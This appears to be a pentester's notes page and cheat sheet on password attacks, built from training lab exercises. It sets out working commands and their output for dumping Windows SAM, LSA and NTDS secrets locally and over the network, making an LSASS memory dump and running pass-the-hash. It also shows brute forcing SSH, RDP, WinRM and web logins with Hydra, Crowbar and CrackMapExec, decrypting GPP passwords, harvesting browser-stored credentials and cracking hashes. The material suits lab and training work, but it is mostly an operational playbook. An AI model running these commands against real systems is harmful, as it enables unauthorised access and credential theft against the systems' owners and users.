Brute Forcing/ Password Cracking
Hash Identifier
hash-identifier somehashhashid hash1.txt
Online Hash Crackers
Default Credentials
base64 decoder
base64 -d encoded textWindows Password Cracking
Dumping SAM files
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.Dumping Hashes with Impacket's secretsdump.py
One incredibly useful tool we can use to dump the hashes offline is Impacket's secretsdump.py. Impacket can be found on most modern penetration testing distributions. We can check for it by using locate on a Linux-based system:
Locating secretsdump.py
ammartiger@htb[/htb]$ locate secretsdump Using secretsdump.py is a simple process. All we must do is run secretsdump.py using Python, then specify each hive file we retrieved from the target host.
Running secretsdump.py
ammartiger@htb[/htb]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb1e1744d2dc4403f9fb0420d84c3299ba28f0643
dpapi_userkey:0x7995f82c5de363cc012ca6094d381671506fd362
[*] NL$KM
0000 D7 0A F4 B9 1E 3E 77 34 94 8F C4 7D AC 8F 60 69 .....>w4...}..`i
0010 52 E1 2B 74 FF B2 08 5F 59 FE 32 19 D6 A7 2C F8 R.+t..._Y.2...,.
0020 E2 A4 80 E0 0F 3D F8 48 44 98 87 E1 C9 CD 4B 28 .....=.HD.....K(
0030 9B 7B 8B BF 3D 59 DB 90 D8 C7 AB 62 93 30 6A 42 .{..=Y.....b.0jB
NL$KM:d70af4b91e3e7734948fc47dac8f606952e12b74ffb2085f59fe3219d6a72cf8e2a480e00f3df848449887e1c9cd4b289b7b8bbf3d59db90d8c7ab6293306a42
[*] Cleaning up... Here we see that secretsdump successfully dumps the local SAM hashes and would've also dumped the cached domain logon information if the target was domain-joined and had cached credentials present in hklm\security. Notice the first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database, which is why it is important for us to have copies of the registry hives we discussed earlier in this section. Notice at the top of the secretsdump.py output:
Dumping local SAM hashes (uid:rid:lmhash:nthash)This tells us how to read the output and what hashes we can crack. Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS.
Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords. It may be beneficial to make a note of each user, so we know which password is associated with which user account.
Generating Word list with Crunch
crunch 3 3 0123456789ABCDEF -o 3digits.txt3 the first number is the minimum length of the generated password
3 the second number is the maximum length of the generated password
0123456789ABCDEF is the character set to use to generate the passwords
-o 3digits.txt saves the output to the 3digits.txt file
Hydra
Http brute force with Hydra
hydra -C tomcat-betterdefaultpasslist.txt -s 8080 10.10.10.95 http-get /manager/html
HTTP GET FORM
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.209.35 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid" -V -I -t 4Hydra Post Form
hydra -l '' -P 3digits.txt -f -v MACHINE_IP http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000-l '' indicates that the login name is blank as the security lock only requires a password
-P 3digits.txt specifies the password file to use
-f stops Hydra after finding a working password
-v provides verbose output and is helpful for catching errors
MACHINE_IP is the IP address of the target
http-post-form specifies the HTTP method to use
"/login.php:pin=^PASS^:Access denied" has three parts separated by : /login.php is the page where the PIN code is submitted pin=^PASS^ will replace ^PASS^ with values from the password list Access denied indicates that invalid passwords will lead to a page that contains the text “Access denied”
-s 8000 indicates the port number on the target
Hydra SSH brute force
┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ hydra -L users -P passwords ssh://10.129.65.27
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-07 15:29:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21112 login tries (l:104/p:203), ~1320 tries per task
[DATA] attacking ssh://10.129.65.27:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 20936 to do in 01:58h, 16 active
[22][ssh] host: 10.129.65.27 login: dennis password: rockstarJohn the Ripper
SSH key
ssh2john key.pem >hash.txtSimple Format to crack hashes
john --wordlist=[path to wordlist] [path to file]To list supported hash types by John
john --list=formatsCracking Hashes
john hash1.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-md5
john hash2.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-sha1
john hash3.txt -w=/usr/share/wordlists/rockyou.txt --format=raw-sha256
john hash4.txt -w=/usr/share/wordlists/rockyou.txt --format=whirlpool
john ntlm.txt -w=/usr/share/wordlists/rockyou.txt --format=nt
Linux Password cracking
unshadow [path to passwd] [path to shadow]
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txtSingle Crack Mode
John also has another mode, called Single Crack mode. In this mode, John uses only the information provided in the username, to try and work out possible passwords heuristically, by slightly changing the letters and numbers contained within the username. To use single crack mode, we use roughly the same syntax that we've used to so far, for example if we wanted to crack the password of the user named "Mike", using single mode, we'd use:
john --single --format=[format] [path to file]If you're cracking hashes in single crack mode, you need to change the file format that you're feeding john for it to understand what data to create a wordlist from. You do this by prepending the hash with the username that the hash belongs to, so according to the above example- we would change the file hashes.txt
From:
1efee03cdcb96d90ad48ccc7b8666033
To
mike:1efee03cdcb96d90ad48ccc7b8666033
Zip Hash cracking
zip2john [options] [zip file] > [output file]
john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txtRar Password Cracking
rar2john rarfile.rar > rar_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt rar_hash.txtgpg Encryption
GnuPG or GPG is an Open Source implementation of PGP from the GNU project. You may need to use GPG to decrypt files in CTFs. With PGP/GPG, private keys can be protected with passphrases in a similar way to SSH private keys. If the key is passphrase protected, you can attempt to crack this passphrase using John The Ripper and gpg2john.
Import gpg key
gpg --import tryhackme.keyDecrypt Message
gpg --decrypt message.gpg Cracking groups.xml file (Windows server 2008)
Viewing the downloaded file, we get the username." userName="active.htb\SVC_TGS"
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>Now lets decrypt it with gpp-decrypt
┌──(kali㉿kali)-[~/Desktop]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18Crackmapexec
Let's check if we have access through winrm.
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"
SMB 10.10.10.161 5985 FOREST [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice ┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ crackmapexec winrm 10.129.65.27 -u users -p passwords
SMB 10.129.65.27 5985 WINSRV [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
HTTP 10.129.65.27 5985 WINSRV [*] http://10.129.65.27:5985/wsman
WINRM 10.129.65.27 5985 WINSRV [-] WINSRV\john:123456
WINRM 10.129.65.27 5985 WINSRV [-] WINSRV\john:12345
WINRM 10.129.65.27 5985 WINSRV [-] WINSRV\john:123456789
WINRM 10.129.65.27 5985 WINSRV [-] WINSRV\john:batman
WINRM 10.129.65.27 5985 WINSRV [-] WINSRV\john:password
WINRM 10.129.65.27 5985 WINSRV [-] WINSRV\john:iloveyou
WINRM 10.129.65.27 5985 WINSRV [-] WINSRV\john:princess
WINRM 10.129.65.27 5985 WINSRV [+] WINSRV\john:november (Pwn3d!)Evil-winrm
We can then use evil-winrm to connect to our target
┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ evilwinrm -i 10.129.65.27 -u john -p november
bash: evilwinrm: command not found
┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ evil-winrm -i 10.129.65.27 -u john -p november
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents>
SSH Bruteforcing CrackMapExec
┌─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ crackmapexec ssh 10.129.65.27 -u users -p passwords
SSH 10.129.65.27 22 10.129.65.27 [*] SSH-2.0-OpenSSH_for_Windows_7.7
SSH 10.129.65.27 22 10.129.65.27 [-] john:123456 Authentication failed.
SSH 10.129.65.27 22 10.129.65.27 [-] john:12345 Authentication failed.
SSH 10.129.65.27 22 10.129.65.27 [-] dennis:november Authentication failed.
SSH 10.129.65.27 22 10.129.65.27 [-] dennis:1234567 Authentication failed.
SSH 10.129.65.27 22 10.129.65.27 [-] dennis:12345678 Authentication failed.
SSH 10.129.65.27 22 10.129.65.27 [+] dennis:rockstar Listing Shares with crackmapexec
─[eu-academy-1]─[10.10.14.49]─[htb-ac-618469@htb-vp290c6ser]─[~/Desktop]
└──╼ [★]$ crackmapexec smb 10.129.65.27 -u john -p november --shares
SMB 10.129.65.27 445 WINSRV [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 10.129.65.27 445 WINSRV [+] WINSRV\john:november
SMB 10.129.65.27 445 WINSRV [+] Enumerated shares
SMB 10.129.65.27 445 WINSRV Share Permissions Remark
SMB 10.129.65.27 445 WINSRV ----- ----------- ------
SMB 10.129.65.27 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.65.27 445 WINSRV C$ Default share
SMB 10.129.65.27 445 WINSRV CASSIE
SMB 10.129.65.27 445 WINSRV IPC$ READ Remote IPCWe can then use smbclient to view the share
You can also use MSF to bruteforce SMB.
Crowbar
Crowbar can be used to bruteforce RDP password much quicker.
crowbar -b rdp -s 10.129.33.49/32 -u johanna -C mut_password.list2025-01-08 02:23:52 START
2025-01-08 02:23:52 Crowbar v0.4.2
2025-01-08 02:23:52 Trying 10.129.33.49:3389
2025-01-08 02:31:06 RDP-SUCCESS : 10.129.33.49:3389 - johanna:1231234!
Password Mutations
Considering that many people want to keep their passwords as simple as possible despite password policies, we can create rules for generating weak passwords. Based on statistics provided by WPengine, most password lengths are not longer than ten characters. So what we can do is to pick specific terms that are at least five characters long and seem to be the most familiar to the users, such as the names of their pets, hobbies, preferences, and other interests. If the user chooses a single word (such as the current month), adds the current year, followed by a special character, at the end of their password, we would reach the ten-character password requirement. Considering that most companies require regular password changes, a user can modify their password by just changing the name of a month or a single number, etc. Let's use a simple example to create a password list with only one entry.
Password List
[!bash!]$ cat password.list
passwordWe can use a very powerful tool called Hashcat to combine lists of potential names and labels with specific mutation rules to create custom wordlists. To become more familiar with Hashcat and discover the full potential of this tool, we recommend the module Cracking Passwords with Hashcat. Hashcat uses a specific syntax for defining characters and words and how they can be modified. The complete list of this syntax can be found in the official documentation of Hashcat. However, the ones listed below are enough for us to understand how Hashcat mutates words.
Function
Description
:
Do nothing.
l
Lowercase all letters.
u
Uppercase all letters.
c
Capitalize the first letter and lowercase others.
sXY
Replace all instances of X with Y.
$!
Add the exclamation character at the end.
Each rule is written on a new line which determines how the word should be mutated. If we write the functions shown above into a file and consider the aspects mentioned, this file can then look like this:
Hashcat Rule File
[!bash!]$ cat custom.rule
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@Hashcat will apply the rules of custom.rule for each word in password.list and store the mutated version in our mut_password.list accordingly. Thus, one word will result in fifteen mutated words in this case.
Generating Rule-based Wordlist
[!bash!]$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
[!bash!]$ cat mut_password.list
password
Password
passw0rd
Passw0rd
p@ssword
P@ssword
P@ssw0rd
password!
Password!
passw0rd!
p@ssword!
Passw0rd!
P@ssword!
p@ssw0rd!
P@ssw0rd!Hashcat and John come with pre-built rule lists that we can use for our password generating and cracking purposes. One of the most used rules is best64.rule, which can often lead to good results. It is important to note that password cracking and the creation of custom wordlists is a guessing game in most cases. We can narrow this down and perform more targeted guessing if we have information about the password policy and take into account the company name, geographical region, industry, and other topics/words that users may select from to create their passwords. Exceptions are, of course, cases where passwords are leaked and found.
Hashcat Existing Rules
[!bash!]$ ls /usr/share/hashcat/rules/
best64.rule specific.rule
combinator.rule T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
d3ad0ne.rule T0XlC-insert_space_and_special_0_F.rule
dive.rule T0XlC-insert_top_100_passwords_1_G.rule
generated2.rule T0XlC.rule
generated.rule T0XlCv1.rule
hybrid toggles1.rule
Incisive-leetspeak.rule toggles2.rule
InsidePro-HashManager.rule toggles3.rule
InsidePro-PasswordsPro.rule toggles4.rule
leetspeak.rule toggles5.rule
oscommerce.rule unix-ninja-leetspeak.rule
rockyou-30000.ruleGenerating wordlist from a website with CEWL
We can now use another tool called CeWL to scan potential words from the company's website and save them in a separate list. We can then combine this list with the desired rules and create a customized password list that has a higher probability of guessing a correct password. We specify some parameters, like the depth to spider (-d), the minimum length of the word (-m), the storage of the found words in lowercase (--lowercase), as well as the file where we want to store the results (-w).
Generating Wordlists Using CeWL
[!bash!]$ cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
[!bash!]$ wc -l inlane.wordlist
326 Crowbar - another tool for bruteforcing RDP
Works best for RDP brute forcing
┌──(kali㉿kali)-[~/Desktop/Password-Attacks]
└─$ crowbar -b rdp -U username.list -C password.list -s 10.129.204.178/32
2024-04-08 05:37:01 START
2024-04-08 05:37:01 Crowbar v0.4.2
2024-04-08 05:37:01 Trying 10.129.204.178:3389
2024-04-08 05:42:21 RDP-SUCCESS : 10.129.204.178:3389 - chris:789456123
Xfreerdp
┌──(kali㉿kali)-[~/Desktop/Password-Attacks]
└─$ xfreerdp /v:10.129.32.51 /u:chris /p:789456123
[05:46:22:130] [67171:67172] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[05:46:22:130] [67171:67172] [WARN][com.freerdp.crypto] - CN = WINSRV
[05:46:27:555] [67171:67172] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[05:46:27:556] [67171:67172] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[05:46:27:629] [67171:67172] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[05:46:27:629] [67171:67172] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic VRemote Dumping & LSA Secrets Considerations
With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network. This could allow us to extract credentials from a running service, scheduled task, or application that uses LSA secrets to store passwords.
ammartiger@htb[/htb]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
SMB 10.129.42.198 445 WS01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB 10.129.42.198 445 WS01 [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB 10.129.42.198 445 WS01 [+] Dumping LSA secrets
SMB 10.129.42.198 445 WS01 WS01\worker:Hello123
SMB 10.129.42.198 445 WS01 dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB 10.129.42.198 445 WS01 NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB 10.129.42.198 445 WS01 [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.secrets and /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cachedDumping SAM Remotely
We can also dump hashes from the SAM database remotely.
ammartiger@htb[/htb]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
SMB 10.129.42.198 445 WS01 [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB 10.129.42.198 445 WS01 [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB 10.129.42.198 445 WS01 [+] Dumping SAM hashes
SMB 10.129.42.198 445 WS01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.42.198 445 WS01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.42.198 445 WS01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.42.198 445 WS01 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB 10.129.42.198 445 WS01 bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB 10.129.42.198 445 WS01 sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB 10.129.42.198 445 WS01 rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB 10.129.42.198 445 WS01 worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB 10.129.42.198 445 WS01 [+] Added 8 SAM hashes to the databasePassword Cracking Cheatsheat
Connecting to Target
Command
Description
xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!
CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol.
evil-winrm -i <ip> -u user -p password
Uses Evil-WinRM to establish a Powershell session with a target.
ssh user@<ip>
Uses SSH to connect to a target using a specified user.
smbclient -U user \\\\<ip>\\SHARENAME
Uses smbclient to connect to an SMB share using a specified user.
python3 smbserver.py -smb2support CompData /home/<nameofuser>/Documents/
Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.
Password Mutations
Command
Description
cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
Uses cewl to generate a wordlist based on keywords present on a website.
hashcat --force password.list -r custom.rule --stdout > mut_password.list
Uses Hashcat to generate a rule-based word list.
./username-anarchy -i /path/to/listoffirstandlastnames.txt
Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username.
curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt
Uses Linux-based commands curl, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords.
Remote Password Attacks
Command
Description
crackmapexec winrm <ip> -u user.list -p password.list
Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.
crackmapexec smb <ip> -u "user" -p "password" --shares
Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials.
hydra -L user.list -P password.list <service>://<ip>
Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.
hydra -l username -P password.list <service>://<ip>
Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.
hydra -L user.list -p password <service>://<ip>
Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.
hydra -C <user_pass.list> ssh://<IP>
Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.
crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam
Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network.
crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa
Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way.
crackmapexec smb <ip> -u <username> -p <password> --ntds
Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network.
evil-winrm -i <ip> -u Administrator -H "<passwordhash>"
Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of Pass-The-Hash attack.
Windows Local Password Attacks
Command
Description
tasklist /svc
A command-line-based utility in Windows used to list running processes.
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
Uses Windows command-line based utility findstr to search for the string "password" in many different file type.
Get-Process lsass
A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line.
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials.
pypykatz lsa minidump /path/to/lsassdumpfile
Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file.
reg.exe save hklm\sam C:\sam.save
Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).
move sam.save \\<ip>\NameofFileShare
Uses move in Windows to transfer a file to a specified file share over the network.
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Uses Secretsdump.py to dump password hashes from the SAM database.
vssadmin CREATE SHADOW /For=C:
Uses Windows command line based tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely.
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of C:.
Linux Local Password Attacks
Command
Description
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done
Script that can be used to find .conf, .config and .cnf files on a Linux system.
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done
Script that can be used to find credentials in specified file types.
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done
Script that can be used to find common database files.
find /home/* -type f -name "*.txt" -o ! -name "*.*"
Uses Linux-based find command to search for text files.
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share";done
Script that can be used to search for common file types used with scripts.
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib|fonts|share|core" ;done
Script used to look for common types of documents.
cat /etc/crontab
Uses Linux-based cat command to view the contents of crontab in search for credentials.
ls -la /etc/cron.*/
Uses Linux-based ls -la command to list all files that start with cron contained in the etc directory.
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
Uses Linux-based command grep to search the file system for key terms PRIVATE KEY to discover SSH keys.
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
Uses Linux-based grep command to search for the keywords PRIVATE KEY within files contained in a user's home directory.
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"
Uses Linux-based grep command to search for keywords ssh-rsa within files contained in a user's home directory.
tail -n5 /home/*/.bash*
Uses Linux-based tail command to search the through bash history files and output the last 5 lines.
python3 mimipenguin.py
Runs Mimipenguin.py using python3.
bash mimipenguin.sh
Runs Mimipenguin.sh using bash.
python2.7 lazagne.py all
Runs Lazagne.py with all modules using python2.7
ls -l .mozilla/firefox/ | grep default
Uses Linux-based command to search for credentials stored by Firefox then searches for the keyword default using grep.
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
Uses Linux-based command cat to search for credentials stored by Firefox in JSON.
python3.9 firefox_decrypt.py
Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9.
python3 lazagne.py browsers
Runs Lazagne.py browsers module using Python 3.
Cracking Passwords
Command
Description
hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt
Uses Hashcat to crack NTLM hashes using a specified wordlist.
hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show
Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output.
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking.
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked.
hashcat -m 500 -a 0 md5-hashes.list rockyou.txt
Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file.
hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked
Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked.
ssh2john.pl SSH.private > ssh.hash
Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.
john ssh.hash --show
Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal.
office2john.py Protected.docx > protected-docx.hash
Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.
john --wordlist=rockyou.txt protected-docx.hash
Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash.
pdf2john.pl PDF.pdf > pdf.hash
Runs Pdf2john.pl script to convert a pdf file to a pdf has to be cracked.
john --wordlist=rockyou.txt pdf.hash
Runs John in conjunction with a wordlist to crack a pdf hash.
zip2john ZIP.zip > zip.hash
Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash.
john --wordlist=rockyou.txt zip.hash
Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.
bitlocker2john -i Backup.vhd > backup.hashes
Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.
file GZIP.gzip
Uses the Linux-based file tool to gather file format information.
for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done
Script that runs a for-loop to extract files from an archive.
Last updated